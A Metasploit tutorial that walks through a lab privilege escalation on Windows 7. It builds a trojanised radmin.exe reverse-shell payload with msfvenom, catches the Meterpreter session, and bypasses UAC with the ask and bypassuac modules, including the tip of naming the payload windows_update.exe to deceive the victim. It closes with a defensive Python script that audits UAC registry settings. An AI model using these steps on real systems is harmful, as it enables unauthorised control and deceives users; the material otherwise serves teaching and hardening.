Meterpreter is a powerful set of shells integrated into MSF; once we obtain a reverse Meterpreter shell, we can easily control the target through its many commands. Anyone familiar with Meterpreter knows it has a getsystem command. The help text only says it is for privilege escalation, with no further detail, so many people mistake it for Meterpreter's one-click privilege escalation tool, but every time they run it they get various "incorrect" and "denied" errors. This article uses theory and experiment to explain the environment in which this command applies and how the escalation actually works.
Target: Windows 7, IP 10.10.10.166
Attacker: Kali 2020, IP 10.10.10.136
1. On the attacker machine, use msfvenom to generate a Meterpreter payload and download it onto the target.
root@kali2020:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.136 LPORT=4444 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o rradmin.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 1319424 bytes
Saved as: rradmin.exe
2. Start the listener on the attacker machine, run the payload on the target to obtain the reverse shell, then run getsystem: the escalation fails.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:4444
[*] Sending stage (180291 bytes) to 10.10.10.166
[*] Meterpreter session 1 opened (10.10.10.136:4444 -> 10.10.10.166:50129) at 2020-07-16 00:40:06 -0400
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
From the Meterpreter prompt we can use the shell command to drop into a cmd prompt and run net user to check the current user. It turns out the current user is actually a member of the Administrators group, so why does escalation still fail?
The reason is that since Vista, Windows includes a feature called UAC (User Account Control), which places certain restrictions on members of the Administrators group in order to protect the computer. Whenever we need to run an important program, one that only runs with administrator rights, UAC pops up a dialog asking the user for permission; only after the user clicks Yes does the program run with administrator or SYSTEM privileges. Therefore, to escalate successfully we must first get around the Windows UAC restriction. Next we look at the commonly used ways of bypassing UAC.
1. Bypassing UAC with the exploit/windows/local/ask module
In the exploit/windows/local/ask module, configure the options and set the session obtained earlier. To mislead the victim, we can set the FILENAME option to a deceptive file name such as windows_update.exe.
msf5 exploit(windows/local/ask) > show options
Module options (exploit/windows/local/ask):
Name       Current Setting     Required  Description
----       ---------------     --------  -----------
FILENAME   windows_update.exe  no        File name on disk
PATH                           no        Location on disk, %TEMP% used if not set
SESSION    1                   yes       The session to run this module on.
TECHNIQUE  EXE                 yes       Technique to use (Accepted: PSH, EXE)
Once the user on the target clicks Yes, a new session comes back to the attacker. Checking the uid shows we are still the lovely user, but now running getsystem succeeds and we get SYSTEM privileges.
msf5 exploit(windows/local/ask) > run
[*] Started reverse TCP handler on 10.10.10.136:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading windows_update.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (180291 bytes) to 10.10.10.166
[*] Meterpreter session 3 opened (10.10.10.136:4444 -> 10.10.10.166:50147) at 2020-07-16 01:54:46 -0400
meterpreter > getuid
Server username: lovely-PC\lovely
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
2. Bypassing UAC with the exploit/windows/local/bypassuac module
Unlike the ask module, this module does not need the user to click a prompt; once executed it bypasses the UAC restriction automatically. The process is as follows.
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > show options
Module options (exploit/windows/local/bypassuac):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
SESSION                     yes       The session to run this module on.
TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)
Exploit target:
Id  Name
--  ----
0   Windows x86
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > show options
Module options (exploit/windows/local/bypassuac):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
SESSION    1                yes       The session to run this module on.
TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)
Exploit target:
Id  Name
--  ----
0   Windows x86
msf exploit(bypassuac) > run
[*] Started reverse TCP handler on 10.10.10.136:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957487 bytes) to 10.10.10.166
[*] Meterpreter session 2 opened (10.10.10.136:4444 -> 10.10.10.166:49162) at 2020-07-22 22:57:46 -0400
meterpreter > getuid
Server username: root-PC\root
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Meterpreter's getsystem command is really an escalation method for users who are already in the Windows Administrators group. When the user is not in the Administrators group, we usually escalate through a system overflow vulnerability instead. When the user we obtained is in the Administrators group, we first need to bypass UAC, and then running getsystem escalates us to SYSTEM.
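The two experiments above come down to three registry values that configure UAC. The first run fails because EnableLUA gives an Administrators member a filtered token; the ask module only needs one click because the default level asks for consent rather than a password; and the bypassuac module reported "UAC is set to Default" before continuing. The following Python script is an added example, not part of the original post or of Metasploit, that parses the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` and reports which of those situations a host is in, so an administrator can check a machine before it is tested. The value names are the real UAC registry values; the two `reg query` samples are constructed, and the meanings assigned to ConsentPromptBehaviorAdmin follow Microsoft's documented values for that setting.

```python
import re

# Value names live under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
# ConsentPromptBehaviorAdmin meanings follow Microsoft's documentation for that value.
ADMIN_PROMPT = {
    0: "elevate silently, no prompt",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries",  # the slider's default position
}

# Constructed sample of `reg query` output for a host at the default UAC level,
# the state the bypassuac run above printed as "UAC is set to Default".
SAMPLE_DEFAULT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser     REG_DWORD    0x3
    EnableLUA                     REG_DWORD    0x1
    PromptOnSecureDesktop         REG_DWORD    0x1
"""

# Constructed sample for a hardened host: every elevation asks for a password
# on the secure desktop, so a single click on a prompt is never enough.
SAMPLE_HARDENED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x1
    EnableLUA                     REG_DWORD    0x1
    PromptOnSecureDesktop         REG_DWORD    0x1
"""


def parse_reg_query(text):
    """Return {value_name: int} for every REG_DWORD line of `reg query` output."""
    pattern = re.compile(r"^\s*(\w+)\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.M)
    return {m.group(1): int(m.group(2), 16) for m in pattern.finditer(text)}


def assess_uac(values):
    """Summarise what the UAC settings mean for the two scenarios in the article."""
    enable_lua = values.get("EnableLUA", 1)
    admin = values.get("ConsentPromptBehaviorAdmin", 5)
    secure = values.get("PromptOnSecureDesktop", 1)

    result = {
        # With UAC on, an Administrators member logs on with a filtered (medium
        # integrity) token, which is why getsystem failed in the first run.
        "filtered_admin_token": enable_lua == 1,
        # Values 0, 2, 4 and 5 never ask for a password: one click (or none)
        # is enough, so a consent prompt like the one the ask module raises can succeed.
        "no_password_needed": enable_lua == 1 and admin in (0, 2, 4, 5),
        # The slider default, the level the bypassuac run reported it can bypass.
        "slider_default": enable_lua == 1 and admin == 5 and secure == 1,
        # Prompt on the secure desktop for every elevation ("Always notify" or stricter).
        "always_notify": enable_lua == 1 and admin in (1, 2) and secure == 1,
        "admin_prompt": ADMIN_PROMPT.get(admin, "unknown") if enable_lua == 1 else "UAC disabled",
    }
    findings = []
    if enable_lua == 0:
        findings.append("UAC is disabled: administrators run fully elevated")
    if result["slider_default"]:
        findings.append("UAC at slider default: raise to 'Always notify'")
    if result["no_password_needed"]:
        findings.append("consent prompt only: set ConsentPromptBehaviorAdmin to 1 to require a password")
    if enable_lua == 1 and secure == 0:
        findings.append("PromptOnSecureDesktop is 0: elevation prompts are not isolated on the secure desktop")
    result["findings"] = findings
    return result


if __name__ == "__main__":
    for name, sample in (("default", SAMPLE_DEFAULT), ("hardened", SAMPLE_HARDENED)):
        print(name, assess_uac(parse_reg_query(sample)))
```

Feed it the real output of `reg query` from the host under review; with the constructed default sample it reports both a filtered admin token and a consent-only prompt, while the hardened sample produces no findings.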